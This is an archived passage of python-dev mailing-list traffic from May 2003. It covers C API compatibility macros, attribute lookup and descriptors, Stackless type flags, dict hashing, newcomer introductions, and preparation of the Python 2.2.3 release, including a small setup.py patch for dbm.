> [Michael Hudson]
>> Hey, even Tims can't spell my name right!
>
> Are you sure it wasn't your parents who screwed up here <wink>? 

It would certainly be easier for the large fraction of the world who
aren't called Michael if it was spelled like that, but it ain't.  It
is remarkable just how often people do that though.

> I have a flu, and am lucky to spell anything write these dayz.  My
> apologies to you and your parents.

Heh, well I'm taking enough drugs to cope with my wisdom teeth today
you're lucky if I make sense never mind spell things right.

>>> It would be a good idea to add suitable redefinitions of
>>> PyMODINIT_FUNC to pymemcompat.h too, but whether someone will
>>> volunteer to do so is an open question.
>
>> Well, I could do this in a minute, but
>
> Time's up.

I was clearly being optimistic here :-/

>> (a) the file then becomes misnamed (perhaps pyapicompat.h ...)
>
> Sounds good to me.
>
>> (b) I suspect some fraction of the value of pymemcompat.h is that it
>>     is short and has just-less-than abusive guidance on which memory
>>     API functions to use.
>
> A new pyapicompat.h could just #include the current pymemcompat.h and a new
> pywhatevercompat.h.  I'm not sure how easy the latter would be.  The new
>
>   PyAPI_FUNC(type)
>   PyAPI_DATA(type)
>   PyMODINIT_FUNC
>
> have snaky platform-dependent expansions, and were introduced because the
> older spellings were approximately incomprehensibly smushed together.  Since
> I don't know what to do offhand if I wanted to support multiple Pythons
> using the current API here, I have to guess most users won't either (for
> example, Jim's sample docs change the last one to plain void, which isn't
> always right); so if you do, I believe it would be a real help.

I thought the problem with DL_IMPORT/DL_EXPORT was that you wanted one
when statically linking and the other when dynamically linking.  But I
could be wrong.  pyapicompat.h could presumably import more or less
verbatim the whole preprocessory mess that defines PyAPI_FUNC in
Python today? AFAIK it doesn't depend on anything else from Python or
autoconf or so on.  Maybe.

Cheers,
M.

-- 
  NUTRIMAT:  That drink was individually tailored to meet your
             personal requirements for nutrition and pleasure.
    ARTHUR:  Ah.  So I'm a masochist on a diet am I?
                    -- The Hitch-Hikers Guide to the Galaxy, Episode 9


From mwh@python.net  Tue May 20 19:46:42 2003
From: mwh@python.net (Michael Hudson)
Date: Tue, 20 May 2003 19:46:42 +0100
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <2mel2tpj00.fsf@starship.python.net> (Michael Hudson's message
 of "Tue, 20 May 2003 19:31:43 +0100")
References: <LNBBLJKPBEHFEDALKOLCKELPEGAB.tim.one@comcast.net>
 <2mel2tpj00.fsf@starship.python.net>
Message-ID: <2mbrxxpib1.fsf@starship.python.net>

Michael Hudson <mwh@python.net> writes:

> pyapicompat.h could presumably import more or less verbatim the
> whole preprocessory mess that defines PyAPI_FUNC in Python today?
> AFAIK it doesn't depend on anything else from Python or autoconf or
> so on.  Maybe.

This is *still* too simplistic, but is probably the right idea.  I'll
try to have a look at it, but won't be disappointed if someone beats
me to it.

Cheers,
M.

-- 
  There are two kinds of large software systems: those that evolved
  from small systems and those that don't work.
                           -- Seen on slashdot.org, then quoted by amk


From tim.one@comcast.net  Tue May 20 20:05:47 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 20 May 2003 15:05:47 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <2mbrxxpib1.fsf@starship.python.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEMIEGAB.tim.one@comcast.net>

[Michael Hudson]
>> pyapicompat.h could presumably import more or less verbatim the
>> whole preprocessory mess that defines PyAPI_FUNC in Python today?
>> AFAIK it doesn't depend on anything else from Python or autoconf or
>> so on.  Maybe.

[Michael too]
> This is *still* too simplistic, but is probably the right idea.  I'll
> try to have a look at it, but won't be disappointed if someone beats
> me to it.

I agree on all counts <wink>.  A difficulty with preprocessor symbols is
their very low "discoverability"; for example, the current maze takes as
input symbols like Py_ENABLE_SHARED and HAVE_DECLSPEC_DLL, and it's rarely
clear where all those may be defined, or why.  I got as far as noting that
the current version of PC/pyconfig.h defines HAVE_DECLSPEC_DLL, and may
define Py_ENABLE_SHARED if Py_NO_ENABLE_SHARED isn't defined, ..., and then
the flu convinced me it's time for another nap.



From BPettersen@NAREX.com  Tue May 20 20:28:18 2003
From: BPettersen@NAREX.com (Bjorn Pettersen)
Date: Tue, 20 May 2003 13:28:18 -0600
Subject: [Python-Dev] Attribute lookup (was Re: python-dev Summary   for 2003-05-01 through 2003-05-15)
Message-ID: <60FB8BB7F0EFC7409B75EEEC13E20192022DE53F@admin56.narex.com>

> From: Phillip J. Eby [mailto:pje@telecommunity.com]

[attribute lookup...]

> > > Also note that special methods are *not* handled specially here.
> > > The behavior Aahz is referring to is that slots (e.g. tp_call) on
> > > new-style types do not retrieve an instance attribute; they are
> > > based purely on class-level data.
> >[...]
> >
> >Wouldn't that be explicitly specified class-level data, i.e. it
> >circumvents the __getattr__ hook completely:
>
> I was focusing on documenting the attribute lookup
> behavior, not the "special methods" behavior.  :)

Fair enough :-)

> My point was only that "special methods" aren't implemented
> via attribute lookup, so the attribute lookup rules don't apply.

Very true, although I don't think I could find that in the documentation
anywhere... RefMan 3.3 paragraph 1, last sentence "Except where
mentioned, attempts to execute an operation raise an exception when no
appropriate method is defined." comes close, but seems to be
contradicted by the "__getattr__" documentation in 3.3.2.

[..implementing __len__ through __getattr__..]

> >The meta example would have to work to be able to create "true" proxy
> >objects(?)
>
> You can always do this:
>
> class C(object):
>      def __len__(self):
>          return self.getLength()
>
>      def __getattr__(self,attr):
>          if attr=='getLength':
>               return lambda: 42
>
> if you really need to do that.

Well... no. E.g. a general RPC proxy might not know what it needs to
special case:

  class MyProxy(object):
     def __init__(self, server, objID, credentials):
         self.__obj = someRPClib.connect(server, objID, credentials)

     def __getattr__(self, attr):
         def send(*args, **kw):
              return self.__obj.remoteExec(attr, args, kw)
         return send

Do you mean defining "stub" methods for _all_ the special methods?
(there are quite a few of them...)
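
(If it came to that, the stubs could at least be generated mechanically --
a sketch only, where _dispatch stands in for some made-up generic
forwarding helper on the proxy:)

    _SPECIAL_NAMES = ['__len__', '__getitem__', '__setitem__', '__call__']  # illustrative subset

    def _make_stub(name):
        def stub(self, *args, **kw):
            return self._dispatch(name, args, kw)    # hypothetical dispatcher
        return stub

    def add_special_stubs(cls, names=_SPECIAL_NAMES):
        # Attach real class-level methods, so that len(), obj[i], obj() etc.
        # find something when the slots are looked up on the class.
        for name in names:
            setattr(cls, name, _make_stub(name))
        return cls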

> >Is this intended behavior?
>
> You'd have to ask Guido that.

:-)  The reason I ask is that I'm trying to convert a compiler.ast graph
into a .NET CodeDom graph, and the current behavior seemed unnecessarily
restrictive...

-- bjorn


From guido@python.org  Tue May 20 20:30:56 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 20 May 2003 15:30:56 -0400
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: "Your message of Tue, 20 May 2003 16:38:03 +0200."
 <3ECA3DCB.50306@tismer.com>
References: <3EC579B4.9000303@tismer.com>
 <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>
 <3EC91EA0.5090105@tismer.com>
 <200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net>
 <3EC94A92.2040604@tismer.com>
 <200305192136.h4JLaOX20032@pcp02138704pcs.reston01.va.comcast.net>
 <3ECA3DCB.50306@tismer.com>
Message-ID: <200305201931.h4KJUuT21506@pcp02138704pcs.reston01.va.comcast.net>

> There is one second thought about this, but I'm not sure
> whether it is allowed to do so:
> 
> Assuming that I *would* simply add a field to PyMethodDef,
> and take care that all types coming from foreign binaries
> don't have that special type bit set, could I not simply create
> a new method table and replace it for that external type
> by just changing its method table pointer?

Probably.

I just realize that there are two uses of PyMethodDef.

One is the "classic", where the type's tp_getattr[o] implementation
calls Py_FindMethod.  The other is the new style where the PyMethodDef
array is in tp_methods, and is scanned once by PyType_Ready.  3rd
party modules that have been around for a while are likely to use
Py_FindMethod.  With Py_FindMethod you don't have a convenient way to
store the pointer to the converted table, so it may be better to
simply check your bit in the first array element and then cast to a
PyMethodDef or a PyMethodDefEx array based on what the bit says (you
can safely assume that all elements of an array are the same size :-).

> I think traversing method tables is always an action that
> the core dll does. Or do I have to fear that an extension
> does special things to method tables at runtime?

I wouldn't lose sleep over that.

> If that approach is trustworthy, I also could drop
> the request for these 8 bits.

Sure.  Ah, a bit in the type would work just as well, and
Py_FindMethod *does* have access to the type.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From op73418@mail.telepac.pt  Wed May 21 01:41:16 2003
From: op73418@mail.telepac.pt (Gonçalo Rodrigues)
Date: Wed, 21 May 2003 01:41:16 +0100
Subject: [Python-Dev] Descriptor API
Message-ID: <000501c31f31$b0c820b0$f3100dd5@violante>

I was doing some tricks with metaclasses and descriptors in Python 2.2 and
stumbled on the following:

>>> class test(object):
...     a = property(lambda: 1)
...
>>> print test.a
<property object at 0x01504D20>
>>> print test.a.__set__
<method-wrapper object at 0x01517220>
>>> print test.a.fset
None

What this means in practice, is that if I want to test if a descriptor is
read-only I have to have two tests: One for custom descriptors, checking
that getting __set__ does not barf and another for property, checking that
fset returns None.
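
A sketch of what that two-step test ends up looking like (an illustrative
helper of mine, not anything in the library):

    def is_readonly(descr):
        # Properties need the special case; other descriptors are judged
        # by the absence of __set__.
        if isinstance(descr, property):
            return descr.fset is None
        return not hasattr(descr, '__set__')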



So, why doesn't getting __set__  raise AttributeError in the above case?



Is this a bug? If it's not, it sure is a (minor) feature request from my
part :-)



With my best regards,

G. Rodrigues




From tismer@tismer.com  Wed May 21 01:50:40 2003
From: tismer@tismer.com (Christian Tismer)
Date: Wed, 21 May 2003 02:50:40 +0200
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: <200305201931.h4KJUuT21506@pcp02138704pcs.reston01.va.comcast.net>
References: <3EC579B4.9000303@tismer.com> <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net> <3EC91EA0.5090105@tismer.com> <200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net> <3EC94A92.2040604@tismer.com> <200305192136.h4JLaOX20032@pcp02138704pcs.reston01.va.comcast.net> <3ECA3DCB.50306@tismer.com> <200305201931.h4KJUuT21506@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3ECACD60.10503@tismer.com>

Guido van Rossum wrote:

>>There is one second thought about this, but I'm not sure
>>whether it is allowed to do so:
>>
>>Assuming that I *would* simply add a field to PyMethodDef,
>>and take care that all types coming from foreign binaries
>>don't have that special type bit set, could I not simply create
>>a new method table and replace it for that external type
>>by just changing its method table pointer?
> 
> 
> Probably.

Promising! Let's see...

> I just realize that there are two uses of PyMethodDef.
> 
> One is the "classic", where the type's tp_getattr[o] implementation
> calls Py_FindMethod.

Right. This one is under my control, since I have the type
and so I have or don't have the bit.

> The other is the new style where the PyMethodDef
> array is in tp_methods, and is scanned once by PyType_Ready.

Right, again. Now, under the hopeful assumption that every
sensible extension module that has some types to publish also
does this through its module dictionary, I would have the
opportunity to cause PyType_Ready to be called early enough
to modify the method table, before any of its methods is used
at all.

> 3rd party modules that have been around for a while are likely to use
> Py_FindMethod.  With Py_FindMethod you don't have a convenient way to
> store the pointer to the converted table, so it may be better to
> simply check your bit in the first array element and then cast to a
> PyMethodDef or a PyMethodDefEx array based on what the bit says (you
> can safely assume that all elements of an array are the same size :-).

Hee hee, yeah. Of course, if there isn't a reliable way to
intercept method table access before the first Py_FindMethod
call, I could of course modify Py_FindMethod. For instance,
a modified, new-style method table might be required to always
start with a dummy entry, where the flags word is completely
-1, to signal having been converted to new-style.

...

>>If that approach is trustworthy, I also could drop
>>the request for these 8 bits.
> 
> Sure.  Ah, a bit in the type would work just as well, and
> Py_FindMethod *does* have access to the type.

You think of the definition in methodobject.c, as it is

"""
/* Find a method in a single method list */

PyObject *
Py_FindMethod(PyMethodDef *methods, PyObject *self, char *name)
"""

, assuming that self is always non-NULL, but represents a valid
object with a type, and that this type already refers to the
methods table?
Except for module objects, this seems to be right. I've run
Python against a lot of Python modules, but none seems
to call Py_FindMethod with a self parameter of NULL.

If that is true, then I can patch a small couple of
C functions to check for the new bit, and if it's not
there, re-create the method table in place.
This is music to my ears. But...

Well, there is a drawback:
I *do* need two bits, and I hope you will allow me to add this
second bit, as well.

The one, first bit, tells me if the source has been compiled
with Stackless and its extension stuff. Nullo problemo.
I can then in-place modify the method table in a compatible
way, or leave it as it is, by default.
But then, this isn't sufficient to set this bit, like an
"everything is fine, now" relief. This is so, since this is *still*
an old module, and while its type's method tables have been
patched, the type is still not augmented by new slots, like
the new tp_call_nr slots (and maybe a bazillion to come, soon).
The drawback is that I cannot simply replace the whole type
object, since type objects are not represented as object
pointers (like they are now, most of the time, in the dynamic
heaptype case), but as constant struct addresses that
the old C module might be referring to.

So, what I think to need is no longer 9 bits, but two of them:
One that says "everything great from the beginning", and another
one that says "well, ok so far, but this is still an old object".

I do think this is the complete story, now.
Instead of requiring nine bits, I'm asking for two.
But this is just *your* option; I can also live with one bit,
but then I have to add a special, invalid method table entry
that just serves for this purpose.
In order to keep my source code hack to the minimum, I'd really
like to ask for the two bits in the typeobject flags.

Thanks so much for being so supportive -- chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/




From tim_one@email.msn.com  Wed May 21 04:56:11 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Tue, 20 May 2003 23:56:11 -0400
Subject: [Python-Dev] Simple dicts
In-Reply-To: <000001c31de1$322a0e90$6401a8c0@damien>
Message-ID: <LNBBLJKPBEHFEDALKOLCKECKEKAB.tim_one@email.msn.com>

[damien morton]
> ...
> I need to address Tim's concerns about the poor hash function used for
> python integers, but I think this can be addressed easily enough.

Caution:  in the context of the current scheme, it's an excellent hash
function.  No hash function could be cheaper to compute, and in the common
case of dicts indexed by a contiguous range of integers, there are no
collisions at all.  Christian Tismer contributed the pathological case in
the dictobject.c comments, but I don't know that any such case has been seen
in real life; the current scheme does OK with it.

> I would welcome some guidance about what hash functions need to be
> addressed though. Is it just integers?

Because, e.g., 42 == 42.0 == 42L, and objects that compare equal must have
equal hashcodes, what we do for ints has to be duplicated for at least some
floats and longs too, and more generally for user-defined numeric types that
can call themselves equal to ints (for example, rationals).  For this reason
it may not be possible to change the hash code for integers (although it
would be possible to scramble the incoming hash code when mapping to a table
slot, which is effectively what the current scheme does but only when a
primary collision occurs).
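
(The constraint in one line, as a quick check -- equal values must hash
equal regardless of type:)

    assert hash(42) == hash(42.0) == hash(42L)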

The string hash code is regular for "consecutive" strings, too (like "ab1",
"ab2", "ab3", ...).

Instances of user-defined classes that don't define their own __hash__
effectively use the memory address as the hash code, and of course that's
also very regular across objects at times.

> (theres a great article on integer hash functions at
> www.cris.com/~Ttwang/tech/inthash.htm)

Cool!  I hadn't seen that before -- thanks for the link.



From pje@telecommunity.com  Wed May 21 12:52:53 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Wed, 21 May 2003 07:52:53 -0400
Subject: [Python-Dev] Descriptor API
In-Reply-To: <000501c31f31$b0c820b0$f3100dd5@violante>
Message-ID: <5.1.0.14.0.20030521074949.01feb1d0@mail.telecommunity.com>

At 01:41 AM 5/21/03 +0100, Gonçalo Rodrigues wrote:

>So, why doesn't getting __set__  raise AttributeError in the above case?

Because property() is a type.  And that type has __get__ and __set__ methods.


>Is this a bug?

No.


>If it's not, it sure is a (minor) feature request from my
>part :-)

To do this would require there to be two types, and 'property()' be a 
function that selected which of the two types to instantiate.

Why do you care whether the attribute is read-only?  Are you writing a 
documentation tool?



From g9robjef@cdf.toronto.edu  Thu May 22 03:04:28 2003
From: g9robjef@cdf.toronto.edu (Jeffery Roberts)
Date: Wed, 21 May 2003 22:04:28 -0400 (EDT)
Subject: [Python-Dev] Introduction
Message-ID: <Pine.LNX.4.55.0305212119400.21497@seawolf.cdf>

Hello all !

I'm new to the list and thought I would quickly introduce myself. My name
is Jeff and I am a university student [4th year] living in Toronto.

I would love to be able to help with Python-dev in some way. I'm
especially interested in issues directly related to the interpreter
itself.  I have gained some compiler development experience while at the
university and would love to continue working in this area.

If anyone has any thoughts or suggestions on how best I could proceed in
this direction, I would love to hear them.

Thanks !

Jeff Roberts


From tismer@tismer.com  Thu May 22 03:25:48 2003
From: tismer@tismer.com (Christian Tismer)
Date: Thu, 22 May 2003 04:25:48 +0200
Subject: [Python-Dev] Introduction
In-Reply-To: <Pine.LNX.4.55.0305212119400.21497@seawolf.cdf>
References: <Pine.LNX.4.55.0305212119400.21497@seawolf.cdf>
Message-ID: <3ECC352C.5060307@tismer.com>

Jeffery Roberts wrote:

> Hello all !
> 
> I'm new to the list and thought I would quickly introduce myself. My name
> is Jeff and I am a university student [4th year] living in Toronto.
> 
> I would love to be able to help with Python-dev in some way. I'm
> especially interested in issues directly related to the interpreter
> itself.  I have gained some compiler development experience while at the
> university and would love to continue working in this area.
> 
> If anyone has any thoughts or suggestions on how best I could proceed in
> this direction, I would love to hear them.

All I can say is: Get involved with PyPy!
There is no harder Python-related stuff that I know of.
It can of course do some damage to your brain. I know what
I'm talking about.
Google for pypy and you got it.

cheers - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/




From tim.one@comcast.net  Thu May 22 04:11:51 2003
From: tim.one@comcast.net (Tim Peters)
Date: Wed, 21 May 2003 23:11:51 -0400
Subject: [Python-Dev] Introduction
In-Reply-To: <Pine.LNX.4.55.0305212119400.21497@seawolf.cdf>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEANEHAB.tim.one@comcast.net>

[Jeffery Roberts]
> I'm new to the list and thought I would quickly introduce myself. My
> name is Jeff and I am a university student [4th year] living in
> Toronto.
>
> I would love to be able to help with Python-dev in some way. I'm
> especially interested in issues directly related to the interpreter
> itself.  I have gained some compiler development experience while at
> the university and would love to continue working in this area.
>
> If anyone has any thoughts or suggestions on how best I could proceed
> in this direction, I would love to hear them.

As Christian said, you should enjoy pypy (an ambitious new project).  Less
ambitious is a rewrite of the front end, currently in progress on the
ast-branch branch of the Python CVS repository.  If you'd like to get your
feet wet first, there's always a backlog of Python bug and patch reports on
SourceForge begging for attention.  Check out

    http://www.python.org/dev/

for orientation, and leave your spare time at the door <wink>.



From martin@v.loewis.de  Thu May 22 08:10:12 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 22 May 2003 09:10:12 +0200
Subject: [Python-Dev] Introduction
In-Reply-To: <Pine.LNX.4.55.0305212119400.21497@seawolf.cdf>
References: <Pine.LNX.4.55.0305212119400.21497@seawolf.cdf>
Message-ID: <m3znlf78yz.fsf@mira.informatik.hu-berlin.de>

Jeffery Roberts <g9robjef@cdf.toronto.edu> writes:

> I would love to be able to help with Python-dev in some way. I'm
> especially interested in issues directly related to the interpreter
> itself.  I have gained some compiler development experience while at the
> university and would love to continue working in this area.

In addition to what Christian suggested, the most valuable short-term
contribution would be to look into open bug reports, and propose fixes
for them. In particular, the Parser/Compiler, and "Python Interpreter
Core" bug categories might attract you (there are 4 bugs in the
former, and about 40 in the latter category). Many of these issues are
still open because they are really tricky, so expect some of these to
be middle-sized projects on their own.

Regards,
Martin



From fdrake@acm.org  Thu May 22 15:09:25 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 22 May 2003 10:09:25 -0400
Subject: [Python-Dev] Preparing docs for Python 2.2.3
Message-ID: <16076.55829.218985.714016@grendel.zope.com>

I'll be preparing the Python docs for the 2.2.3 release today.  If
there are any fixes for 2.2.3 that absolutely *must* go in, we need to
get them in over the next four hours.

I don't expect to have any sort of Internet access from Friday
(tomorrow) through next Tuesday, so the docs really need to be
finished today.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From barry@python.org  Thu May 22 15:23:56 2003
From: barry@python.org (Barry Warsaw)
Date: 22 May 2003 10:23:56 -0400
Subject: [Python-Dev] Python 2.2.3
Message-ID: <1053613436.816.3.camel@barry>

We're going to put together Python 2.2.3 for release today.  Plan on a
check-in freeze starting at 3pm EDT.  If you have stuff you need to get
in, do it now, but please be conservative.

-Barry




From barry@python.org  Thu May 22 16:03:32 2003
From: barry@python.org (Barry Warsaw)
Date: 22 May 2003 11:03:32 -0400
Subject: [Python-Dev] Re: Python 2.2.3
In-Reply-To: <1053613436.816.3.camel@barry>
References: <1053613436.816.3.camel@barry>
Message-ID: <1053615812.816.26.camel@barry>

On Thu, 2003-05-22 at 10:23, Barry Warsaw wrote:
> We're going to put together Python 2.2.3 for release today.  Plan on a
> check-in freeze starting at 3pm EDT.  If you have stuff you need to get
> in, do it now, but please be conservative.

Let me clarify.  After Pylab discussions, we've decided we're going to
make this 2.2.3c1 (release candidate 1).  It's important that folks with
commercial (and other) interest in a solid 2.2.3 release have time to
test it, so we'll do the final 2.2.3 release next week.

-Barry




From skip@pobox.com  Thu May 22 17:35:47 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 22 May 2003 11:35:47 -0500
Subject: [Python-Dev] Of what use is commands.getstatus()
Message-ID: <16076.64611.579396.832520@montanaro.dyndns.org>

I was reading the docs for the commands module and noticed getstatus() seems
to be completely unrelated to getstatusoutput() and getoutput().  I thought,
"I'll correct the docs.  They must be wrong."  Then I looked at commands.py
and saw the docs are correct.  It's the function definition which is weird.
Of what use is it to return 'ls -ld file'?  Based on its name I would have
guessed its function was

    def getstatus(cmd):
        """Return status of executing cmd in a shell."""
        return getstatusoutput(cmd)[0]

This particular function dates from 1990, so it clearly can't just be
deleted, but it seems completely superfluous to me, especially given the
existence of os.stat, os.listdir, etc.  Should it be deprecated or modified
to do (what I think is) the obvious thing?
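
For comparison, the two siblings that do behave the way their names suggest
(a sketch of typical use):

    import commands

    status, output = commands.getstatusoutput('ls -ld /tmp')  # exit status plus captured output
    listing = commands.getoutput('ls -ld /tmp')               # just the output, trailing newline stripped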

Skip


From barry@python.org  Thu May 22 17:43:21 2003
From: barry@python.org (Barry Warsaw)
Date: 22 May 2003 12:43:21 -0400
Subject: [Python-Dev] Python 2.2.3 setup.py patch for RH9 (redux)
Message-ID: <1053621801.816.45.camel@barry>

Back here:

http://mail.python.org/pipermail/python-dev/2003-April/035120.html

I mentioned a failure with dbm module on RedHat 9 which does not fail
for RedHat 7.3.  Here's I think a slightly better patch that I'd like to
commit.  Anybody else who's doing testing on other systems, could you
please try this out and let me know if it causes any problems?

Thanks,
-Barry


[attachment: setup.py-patch]

Index: setup.py
===================================================================
RCS file: /cvsroot/python/python/dist/src/setup.py,v
retrieving revision 1.73.4.18
diff -u -r1.73.4.18 setup.py
--- setup.py	18 May 2003 13:42:58 -0000	1.73.4.18
+++ setup.py	22 May 2003 16:39:08 -0000
@@ -406,6 +406,9 @@
             elif self.compiler.find_library_file(lib_dirs, 'db1'):
                 exts.append( Extension('dbm', ['dbmmodule.c'],
                                        libraries = ['db1'] ) )
+            elif self.compiler.find_library_file(lib_dirs, 'gdbm'):
+                exts.append( Extension('dbm', ['dbmmodule.c'],
+                                       libraries = ['gdbm'] ) )
             else:
                 exts.append( Extension('dbm', ['dbmmodule.c']) )
 




From barry@python.org  Thu May 22 17:56:02 2003
From: barry@python.org (Barry Warsaw)
Date: 22 May 2003 12:56:02 -0400
Subject: [Python-Dev] One other 2.2.3 failure
Message-ID: <1053622561.816.51.camel@barry>

The only other test suite failure I see for Python 2.2.3 is in
test_linuxaudiodev.py.  But since this fails for me in Python 2.3cvs
too, I'm inclined to chalk that up to not having audio set up correctly
on my boxes.

What say ye who haveth a working audio on Linux?

-Barry




From barry@python.org  Thu May 22 17:57:25 2003
From: barry@python.org (Barry Warsaw)
Date: 22 May 2003 12:57:25 -0400
Subject: [Python-Dev] Python 2.2.3 setup.py patch for RH9 (redux)
In-Reply-To: <1053621801.816.45.camel@barry>
References: <1053621801.816.45.camel@barry>
Message-ID: <1053622645.816.53.camel@barry>

On Thu, 2003-05-22 at 12:43, Barry Warsaw wrote:
> Back here:
> 
> http://mail.python.org/pipermail/python-dev/2003-April/035120.html
> 
> I mentioned a failure with dbm module on RedHat 9 which does not fail
> for RedHat 7.3.  Here's I think a slightly better patch that I'd like to
> commit.  Anybody else who's doing testing on other systems, could you
> please try this out and let me know if it causes any problems?

I see no regressions for RedHat 7.3 so I'm feeling optimistic about this
patch <wink>.

-Barry




From skip@pobox.com  Thu May 22 18:30:18 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 22 May 2003 12:30:18 -0500
Subject: [Python-Dev] Python 2.2.3 setup.py patch for RH9 (redux)
In-Reply-To: <1053621801.816.45.camel@barry>
References: <1053621801.816.45.camel@barry>
Message-ID: <16077.2346.379038.567216@montanaro.dyndns.org>

    Barry> I mentioned a failure with dbm module on RedHat 9 which does not
    Barry> fail for RedHat 7.3.  Here's I think a slightly better patch that
    Barry> I'd like to commit.  Anybody else who's doing testing on other
    Barry> systems, could you please try this out and let me know if it
    Barry> causes any problems?

Works for me on Mac OS X.  Of course, it doesn't actually link with gdbm, so
plot a very small data point on your graph.  ;-)

Skip


From g9robjef@cdf.toronto.edu  Thu May 22 21:56:51 2003
From: g9robjef@cdf.toronto.edu (Jeffery Roberts)
Date: Thu, 22 May 2003 16:56:51 -0400 (EDT)
Subject: [Python-Dev] Introduction
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEANEHAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCGEANEHAB.tim.one@comcast.net>
Message-ID: <Pine.LNX.4.55.0305221652550.30389@seawolf.cdf>

Thanks for all of your replies.  The front-end rewrite sounds especially
interesting. I'm going to look into that.  Is the entire front end
changing (ie scan/parse/ast) or just the AST structure ?

If you have any more information or directions please let me know.

Jeff

On Wed, 21 May 2003, Tim Peters wrote:

> [Jeffery Roberts]
> > I'm new to the list and thought I would quickly introduce myself. My
> > name is Jeff and I am a university student [4th year] living in
> > Toronto.
> >
> > I would love to be able to help with Python-dev in some way. I'm
> > especially interested in issues directly related to the interpreter
> > itself.  I have gained some compiler development experience while at
> > the university and would love to continue working in this area.
> >
> > If anyone has any thoughts or suggestions on how best I could proceed
> > in this direction, I would love to hear them.
>
> As Christian said, you should enjoy pypy (an ambitious new project).  Less
> ambitious is a rewrite of the front end, currently in progress on the
> ast-branch branch of the Python CVS repository.  If you'd like to get your
> feet wet first, there's always a backlog of Python bug and patch reports on
> SourceForge begging for attention.  Check out
>
>     http://www.python.org/dev/
>
> for orientation, and leave your spare time at the door <wink>.
>
>


From drifty@alum.berkeley.edu  Thu May 22 21:29:20 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Thu, 22 May 2003 13:29:20 -0700
Subject: [Python-Dev] Introduction
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHMEOGFLAA.tim@zope.com>
References: <BIEJKCLHCIOIHAGOKOLHMEOGFLAA.tim@zope.com>
Message-ID: <3ECD3320.8030605@ocf.berkeley.edu>

Tim Peters wrote:
>>I moved over to Mozilla Mail and I keep hitting "Reply" when I mean to
>>hit "Reply All".  Sorry about  that.
> 
> 
> Oh, it doesn't bother me a bit, Brett!  I'm more concerned that your
> response would have been helpful to the OP, and he didn't get to see it.
> 

Well, let's find out!  Here is my email that was meant to go to the list,
pasted below.

Tim Peters wrote:

 > [Jeffery Roberts]
 >
<snip>

 >> I would love to be able to help with Python-dev in some way. I'm
 >> especially interested in issues directly related to the interpreter
 >> itself.  I have gained some compiler development experience while at
 >> the university and would love to continue working in this area.
 >>
 >> If anyone has any thoughts or suggestions on how best I could proceed
 >> in this direction, I would love to hear them.
 >
 >
 >  If you'd like to get your
 > feet wet first, there's always a backlog of Python bug and patch 
reports on
 > SourceForge begging for attention.


I know I learned a lot from working on patches and bugs.  It especially 
helps if you jump in on a patch that is being actively worked on and can 
ask how something works.  Otherwise just read the source until your eyes 
  bleed and curse anyone who doesn't write extensive documentation for 
code.  =)

There also has been mention of the AST branch.  I know I plan on working 
on that after I finish going through the bug and patch backlog.  Only 
trouble is that the guys who actually fully understand it (Jeremy, Tim, 
and Neal) are rather busy so it is going to be a "jump in the pool and 
drown and hope your flailing manages to at least generate something 
useful but you die and come back in another life wiser and able to 
attempt again until you stop drowning and manage to only get sick from 
gulping down so much chlorinated water".  =)

 >  Check out
 >
 >     http://www.python.org/dev/
 >
 > for orientation, and leave your spare time at the door <wink>.
 >

I will vouch for the loss of spare time.  This has become a job.  Best 
job ever, though.  =)

The only big piece of advice I can offer is to just make sure you are 
nice and cordial on the list; there is a low tolerance for jerks here. 
Don't take this as meaning to not take a stand on an issue!  All I am 
saying is realize that email does not transcribe humor perfectly and
until the list gets used to your personal writing style you might have
to just make sure what you write does not come off as insulting.

-Brett



From drifty@alum.berkeley.edu  Fri May 23 04:21:20 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Thu, 22 May 2003 20:21:20 -0700
Subject: [Python-Dev] Introduction
In-Reply-To: <Pine.LNX.4.55.0305221652550.30389@seawolf.cdf>
References: <LNBBLJKPBEHFEDALKOLCGEANEHAB.tim.one@comcast.net> <Pine.LNX.4.55.0305221652550.30389@seawolf.cdf>
Message-ID: <3ECD93B0.5060704@ocf.berkeley.edu>

Jeffery Roberts wrote:
